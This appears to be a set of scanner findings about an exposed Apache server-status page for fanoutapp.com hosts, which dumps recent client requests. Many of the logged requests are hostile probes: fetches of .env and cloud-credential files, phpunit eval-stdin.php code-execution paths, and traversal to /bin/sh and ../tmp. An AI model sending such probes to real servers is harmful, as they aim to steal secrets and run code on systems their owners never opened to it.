0.294254362630.00.032.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2340463280/11/725_ 0.313780176270.00.032.00 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2340463280/9/745_ 0.3130161374170.00.032.10 127.0.0.1http/1.1api.hnstream.com:8000GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-2340463280/11/759_ 0.293775451510.00.032.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2340463280/11/729_ 0.292587355660.00.032.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-2340463280/12/743_ 0.293011370200.00.032.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 1-2340463280/9/731_ 0.3125921153740.00.021.95 40.124.175.136http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2340463280/9/743_ 0.312587361090.00.022.07 40.124.175.136http/1.1api.hnstream.com:8000MGLNDD_34.27.193.201_8000\n 1-2340463280/8/733_ 0.292587360840.00.031.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.env HTTP/1.1 1-2340463280/9/735_ 0.292587349550.00.031.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /s/1393e2932313e2130313e2135313/_/;/META-INF/maven/com.atla 1-2340463280/9/737_ 0.3225223553270.00.012.45 140.248.74.178http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 1-2340463280/8/741_ 0.302517367920.00.022.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-2340463280/8/727_ 0.322298059210.00.022.18 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 1-2340463280/11/761_ 0.3222981062640.00.032.20 140.248.75.74http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-2340463280/8/740_ 0.282293366190.00.032.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-2340463280/9/726_ 0.302120349840.00.032.03 127.0.0.1http/1.1api.hnstream.com:8000GET /WWIf HTTP/1.1 1-2340463280/11/742_ 0.322125161100.00.032.00 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2340463280/10/735_ 0.311191459760.00.031.92 127.0.0.1http/1.1api.hnstream.com:8000GET /jquery-3.3.2.slim.min.js HTTP/1.1 1-2340463280/9/738_ 0.321214851080.00.022.14 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2340463280/11/729_ 0.321213158280.00.032.04 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 1-2340463280/10/765_ 0.331191158590.00.032.15 127.0.0.1http/1.1api.hnstream.com:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfaff48890
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 12-Dec-2025 23:47:22 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 21 days 1 hour 52 minutes 46 seconds Server load: 0.15 0.20 0.16 Total accesses: 48817 - Total Traffic: 137.3 MB - Total Duration: 440684 CPU Usage: u38.98 s57.02 cu587.83 cs171.21 - .047% CPU load .0268 requests/sec - 79 B/second - 2948 B/request - 9.02727 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 13868607no0yes025000 23868606no1yes124010 Sum201 149010 ........................._______________________________________ ___W_______..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-17-0/0/565. 0.0041223968984240.00.001.79 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.example HTTP/1.1 0-17-0/0/566. 0.0041223918252650.00.001.90 140.248.74.24http/1.1api.hnstream.com:8000GET /config/module.config.php HTTP/1.1 0-17-0/0/548. 0.0041223948157690.00.001.30 140.248.74.24http/1.1api.hnstream.com:8000GET /.docker/.env HTTP/1.1 0-17-0/0/534. 0.0041223913248780.00.001.49 140.248.74.24http/1.1api.hnstream.com:8000GET /config/test.json HTTP/1.1 0-17-0/0/565. 0.0041223921653770.00.001.96 140.248.74.24http/1.1api.hnstream.com:8000GET /config.json HTTP/1.1 0-17-0/0/547. 0.0041223927445790.00.001.75 140.248.74.24http/1.1api.hnstream.com:8000GET /tsconfig.json HTTP/1.1 0-17-0/0/545. 0.0041223929944490.00.001.76 140.248.74.24http/1.1api.hnstream.com:8000GET /?pp=env&pp=env HTTP/1.1 0-17-0/0/553. 0.0041223952952150.00.001.60 140.248.74.24http/1.1api.hnstream.com:8000GET /conf/application.json HTTP/1.1 0-17-0/0/548. 0.0041223941049920.00.002.04 140.248.74.24http/1.1api.hnstream.com:8000GET /appsettings.Local.json HTTP/1.1 0-17-0/0/565. 0.0041223947440210.00.001.85 140.248.74.24http/1.1api.hnstream.com:8000GET /laravel/core/.env HTTP/1.1 0-17-0/0/549. 0.0041223945659160.00.002.13 140.248.74.24http/1.1api.hnstream.com:8000GET /config/dev.json HTTP/1.1 0-17-0/0/574. 0.0041223968960650.00.002.12 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.prod.local HTTP/1.1 0-17-0/0/537. 0.0041223935845280.00.001.66 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.sample HTTP/1.1 0-17-0/0/551. 0.0041223939049230.00.001.67 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.docker.dev HTTP/1.1 0-17-0/0/543. 0.0041223945757780.00.001.80 140.248.74.24http/1.1api.hnstream.com:8000GET /.docker/laravel/app/.env HTTP/1.1 0-17-0/0/550. 0.0041223944143380.00.001.64 140.248.74.24http/1.1api.hnstream.com:8000GET /config/daemon.json HTTP/1.1 0-17-0/0/558. 0.0041223924854030.00.001.75 140.248.74.24http/1.1api.hnstream.com:8000GET /config/settings.json HTTP/1.1 0-17-0/0/572. 0.0041223945453670.00.001.53 140.248.74.24http/1.1api.hnstream.com:8000GET /private/config.json HTTP/1.1 0-17-0/0/559. 0.0041223918951830.00.001.95 140.248.74.24http/1.1api.hnstream.com:8000GET /manifest.json HTTP/1.1 0-17-0/0/561. 0.0041223921658340.00.001.46 140.248.74.24http/1.1api.hnstream.com:8000GET /config/config.php HTTP/1.1 0-17-0/0/547. 0.004122391249630.00.001.59 140.248.74.24http/1.1api.hnstream.com:8000GET /src/config/environment.json HTTP/1.1 0-17-0/0/548. 0.0041223932048010.00.001.68 140.248.74.24http/1.1api.hnstream.com:8000GET /angular.json HTTP/1.1 0-17-0/0/552. 0.0041223926358840.00.001.76 140.248.74.24http/1.1api.hnstream.com:8000GET /tsconfig.spec.json HTTP/1.1 0-17-0/0/543. 0.0041223947847370.00.001.58 140.248.74.24http/1.1api.hnstream.com:8000GET /config/env.php HTTP/1.1 0-17-0/0/558. 0.004122391155110.00.001.95 104.156.91.26http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2138686070/31/690_ 0.991400186240.00.061.76 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2138686070/37/696_ 0.983712462220.00.171.88 127.0.0.1http/1.1api.hnstream.com:8000GET /developmentserver/metadatauploader HTTP/1.1 1-2138686070/25/687_ 0.913712288150.00.111.78 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /karma.conf.json HTTP/1.1 1-2138686070/38/699_ 0.933707457940.00.091.93 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /configs/s3_config.json HTTP/1.1 1-2138686070/34/685_ 0.9829251165210.00.061.90 140.248.68.76http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2138686070/40/703_ 0.982703064510.00.142.00 127.0.0.1http/1.1api.hnstream.com:8000POST /cgi-bin/../../../../../../../../../../bin/sh HTTP/1.1 1-2138686070/34/716_ 0.912920348610.00.062.10 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /backend/config/default.yml HTTP/1.1 1-2138686070/37/687_ 0.982641152630.00.072.11 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2138686070/32/698_ 0.932636055080.00.061.97 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2138686070/34/691_ 0.971395049140.00.051.79 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-2138686070/40/700_ 1.008262558310.00.171.99 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2138686070/39/689_ 1.001691857610.00.171.86 206.168.34.212http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2138686070/32/696_ 0.92821346340.00.051.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /app.js HTTP/1.1 1-2138686070/31/695_ 0.97164550120.00.122.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000HEAD /apps HTTP/1.1 1-2138686070/36/703_ 0.97164465720.00.062.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000HEAD /api/action HTTP/1.1 1-2138686070/35/686_ 1.00161155950.00.071.96 206.168.34.212http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2138686070/32/712_ 0.97161458150.00.052.09 206.168.34.212http/1.1 1-2138686070/39/704_ 0.951482162130.00.091.98 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2138686070/36/686_ 1.00157347520.00.061.86 206.168.34.212http/1.1api.hnstream.com:8000\x16\x03\x01 1-2138686070/34/702_ 0.992572858860.00.061.91 104.156.91.26http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2138686070/35/689_ 0.892567351960.00.091.81 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server-info.php HTTP/1.1 1-2138686070/35/697_ 0.992322848330.00.152.03 140.248.68.76http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2138686070/35/679_ 0.9323171855200.00.061.78 127.0.0.1http/1.1api.hnstream.com:8000GET /lc/libs/livecycle/core/content/login.html HTTP/1.1 1-2138686070/32/723_ 0.9917191250540.00.122.04 140.248.68.76http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2138686070/33/660_ 0.97
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf8654fef4
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Monday, 01-Dec-2025 11:12:36 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 11 Parent Server MPM Generation: 10 Server uptime: 9 days 13 hours 18 minutes 1 second Server load: 0.67 0.31 0.22 Total accesses: 22882 - Total Traffic: 66.3 MB - Total Duration: 174059 CPU Usage: u17.86 s26.07 cu270.97 cs78.15 - .0476% CPU load .0277 requests/sec - 84 B/second - 3039 B/request - 7.60681 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12826014no0yes025000 22826015no1yes124010 Sum201 149010 ........................._____________________________W_________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7-0/0/309. 0.00213128443470.00.001.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-7-0/0/305. 0.00213128429370.00.001.26 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-7-0/0/286. 0.00213128425620.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-7-0/0/283. 0.00213128426370.00.000.68 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-7-0/0/305. 0.00213128817090.00.001.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-7-0/0/296. 0.00213128320480.00.001.01 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-7-0/0/291. 0.00213128420080.00.001.10 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-7-0/0/295. 0.00213128716590.00.000.97 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-7-0/0/301. 0.00213128226730.00.001.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-7-0/0/303. 0.00213128416790.00.001.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-7-0/0/298. 0.00213128730990.00.001.35 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-7-0/0/308. 0.00213128423260.00.001.26 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-7-0/0/295. 0.00213128723810.00.001.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-7-0/0/290. 0.00213128324780.00.000.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-7-0/0/292. 0.00213128823070.00.000.99 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-7-0/0/296. 0.00213128415490.00.000.95 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-7-0/0/301. 0.00213128429300.00.000.94 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-7-0/0/310. 0.00213128722720.00.000.75 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-7-0/0/299. 0.00213128719580.00.001.08 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-7-0/0/295. 0.00213128425940.00.000.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-7-0/0/289. 0.00213128722570.00.000.94 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-7-0/0/294. 0.00213128825750.00.001.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-7-0/0/288. 0.00213128620390.00.000.90 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-7-0/0/286. 0.00213128317420.00.000.78 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-7-0/0/292. 0.00213128426180.00.001.11 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-1028260140/21/412_ 0.54143452530.00.050.92 127.0.0.1http/1.1api.hnstream.com:8000GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-1028260140/16/409_ 0.54139334670.00.040.86 127.0.0.1http/1.1api.hnstream.com:8000GET /containers/json HTTP/1.1 1-1028260140/17/421_ 0.53145354430.00.041.12 127.0.0.1http/1.1api.hnstream.com:8000GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-1028260140/23/411_ 0.54142429820.00.050.82 127.0.0.1http/1.1api.hnstream.com:8000GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-1028260140/17/407_ 0.54715737400.00.041.38 140.248.75.87http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-1028260140/17/419_ 0.53150439690.00.041.21 127.0.0.1http/1.1api.hnstream.com:8000GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-1028260140/22/438_ 0.53151427860.00.041.30 127.0.0.1http/1.1api.hnstream.com:8000GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 1-1028260140/18/412_ 0.54145425870.00.051.54 127.0.0.1http/1.1api.hnstream.com:8000GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-1028260140/22/420_ 0.53146324940.00.051.29 127.0.0.1http/1.1api.hnstream.com:8000GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/22/417_ 0.54144527060.00.051.21 127.0.0.1http/1.1api.hnstream.com:8000GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-1028260140/22/413_ 0.53148436470.00.051.20 127.0.0.1http/1.1api.hnstream.com:8000GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-1028260140/15/407_ 0.53150434340.00.041.15 127.0.0.1http/1.1api.hnstream.com:8000GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/15/415_ 0.53147424430.00.041.08 127.0.0.1http/1.1api.hnstream.com:8000GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-1028260140/16/412_ 0.54143424370.00.041.37 127.0.0.1http/1.1api.hnstream.com:8000GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-1028260140/17/417_ 0.54139433970.00.041.13 127.0.0.1http/1.1api.hnstream.com:8000GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1 1-1028260140/21/407_ 0.53148327960.00.131.22 127.0.0.1http/1.1api.hnstream.com:8000GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-1028260140/18/421_ 0.53149429000.00.041.29 127.0.0.1http/1.1api.hnstream.com:8000GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 1-1028260140/18/415_ 0.54142432090.00.041.30 127.0.0.1http/1.1api.hnstream.com:8000GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/15/407_ 0.53134424110.00.031.08 127.0.0.1http/1.1api.hnstream.com:8000GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/16/422_ 0.53146434080.00.031.25 127.0.0.1http/1.1api.hnstream.com:8000GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/19/410_ 0.5366529340.00.051.22 127.0.0.1http/1.1api.hnstream.com:8000GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/19/416_ 0.54144424580.00.051.35 127.0.0.1http/1.1api.hnstream.com:8000GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf4e8d0b01
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 28-Nov-2025 22:46:18 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 8 Parent Server MPM Generation: 7 Server uptime: 7 days 51 minutes 43 seconds Server load: 0.28 0.22 0.19 Total accesses: 12980 - Total Traffic: 43.6 MB - Total Duration: 108656 CPU Usage: u14.65 s19.71 cu173.88 cs52.66 - .0429% CPU load .0214 requests/sec - 75 B/second - 3526 B/request - 8.37103 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02538790no1yes124010 12538791no0yes025000 Sum201 149010 _______________W__________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-725387900/49/306_ 1.653343020.00.221.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-725387900/45/302_ 1.653329250.00.251.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-725387900/36/283_ 1.651325540.00.080.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-725387900/40/282_ 1.652326330.00.090.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-725387900/46/303_ 1.651317000.00.201.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-725387900/39/292_ 1.652320360.00.210.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-725387900/41/285_ 1.654319740.00.261.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-725387900/41/291_ 1.646315710.00.180.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-725387900/44/297_ 1.646426560.00.261.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-725387900/44/298_ 1.655316580.00.261.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-725387900/44/292_ 1.654330660.00.371.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-725387900/50/303_ 1.655322600.00.251.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-725387900/41/291_ 1.654323590.00.271.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-725387900/40/288_ 1.660324700.00.170.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-725387900/44/287_ 1.661322830.00.120.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-7253879026/39/291W 1.640015010.00.260.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-725387900/43/298_ 1.660328850.00.300.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-725387900/46/304_ 1.646322400.00.130.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-725387900/36/295_ 1.645319330.00.201.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-725387900/42/291_ 1.652325120.00.160.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-725387900/41/284_ 1.654322210.00.260.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-725387900/43/289_ 1.654325300.00.361.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-725387900/37/281_ 1.655319690.00.180.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-725387900/43/284_ 1.653317340.00.110.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-725387900/42/288_ 1.661325690.00.341.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-725387910/23/225_ 0.952934442640.00.040.57 176.65.148.224http/1.1 1-725387910/23/224_ 0.963066514480.00.040.52 23.235.43.71http/1.1api.hnstream.com:8000GET /debug.php HTTP/1.1 1-725387910/21/235_ 0.9229344146120.00.050.78 23.235.43.82http/1.1api.hnstream.com:8000GET /.env.local HTTP/1.1 1-725387910/26/224_ 0.972257320280.00.040.49 140.248.82.35http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 1-725387910/25/227_ 0.971669526540.00.130.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-725387910/26/237_ 0.922252425330.00.060.77 23.235.43.75http/1.1api.hnstream.com:8000GET /.env.test HTTP/1.1 1-725387910/27/236_ 0.953065418020.00.200.91 23.235.43.65http/1.1api.hnstream.com:8000GET /.s3cfg HTTP/1.1 1-725387910/24/225_ 0.963064315450.00.050.81 23.235.43.31http/1.1api.hnstream.com:8000GET /debug.log HTTP/1.1 1-725387910/24/227_ 0.953063314590.00.150.69 23.235.43.93http/1.1api.hnstream.com:8000GET /azure.json HTTP/1.1 1-725387910/27/226_ 0.913064216070.00.100.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /todos/default/items/?after_change=11638 HTTP/1.1 1-725387910/24/229_ 0.953063625420.00.040.71 23.235.43.34http/1.1api.hnstream.com:8000GET /.azure/credentials HTTP/1.1 1-725387910/23/224_ 0.953061521330.00.080.65 23.235.43.34http/1.1api.hnstream.com:8000GET /api_keys.json HTTP/1.1 1-725387910/22/231_ 0.9130595115470.00.120.75 140.248.75.87http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-725387910/26/233_ 0.901642314580.00.210.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-725387910/23/224_ 0.961664619220.00.070.67 23.235.43.88http/1.1api.hnstream.com:8000GET /tokens.json HTTP/1.1 1-725387910/23/226_ 0.9716427414060.00.050.78 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 1-725387910/22/233_ 0.901637317370.00.080.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-725387910/27/230_ 0.96617524240.00.220.88 23.235.43.63http/1.1api.hnstream.com:8000GET /.docker/config.json HTTP/1.1 1-725387910/22/221_ 0.98622112830.00.210.73 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-725387910/25/235_ 0.96365518540.00.170.82 23.235.43.35http/1.1api.hnstream.com:8000GET /phpinfo.php HTTP/1.1 1-725387910/27/220_ 0.98370313760.00.150.59 157.52.109.38http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-725387910/27/227_ 0.963068512880.00.080.68 23.235.43.22http/1.1api.hnstream.com:8000GET /_profiler/phpinfo HTTP/1.1 1-725387910/24/215_ 0.943066316340.00.110.68 23.235.43.90http/1.1api.hnstream.com:8000GET /aws.json HTTP/1.1 1-725387910/21/236_ 0.883066317020.00.050.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-725387910/21/205_ 0.92
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf7e9e95dc
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Thursday, 27-Nov-2025 11:17:27 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 7 Parent Server MPM Generation: 6 Server uptime: 5 days 13 hours 22 minutes 52 seconds Server load: 0.23 0.24 0.20 Total accesses: 10584 - Total Traffic: 33.0 MB - Total Duration: 87847 CPU Usage: u10.59 s15.33 cu146.93 cs44.52 - .0453% CPU load .022 requests/sec - 72 B/second - 3272 B/request - 8.29998 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02447423no1yes124010 12447424no0yes025000 Sum201 149010 ________________W_________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-624474230/16/241_ 0.494332080.00.040.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-624474230/17/239_ 0.496322530.00.030.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-624474230/11/228_ 0.495323380.00.110.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-624474230/15/223_ 0.494316450.00.020.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-624474230/15/241_ 0.493312980.00.121.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-624474230/14/235_ 0.493313990.00.100.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-624474230/16/229_ 0.492316490.00.040.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-624474230/12/230_ 0.4811312820.00.100.72 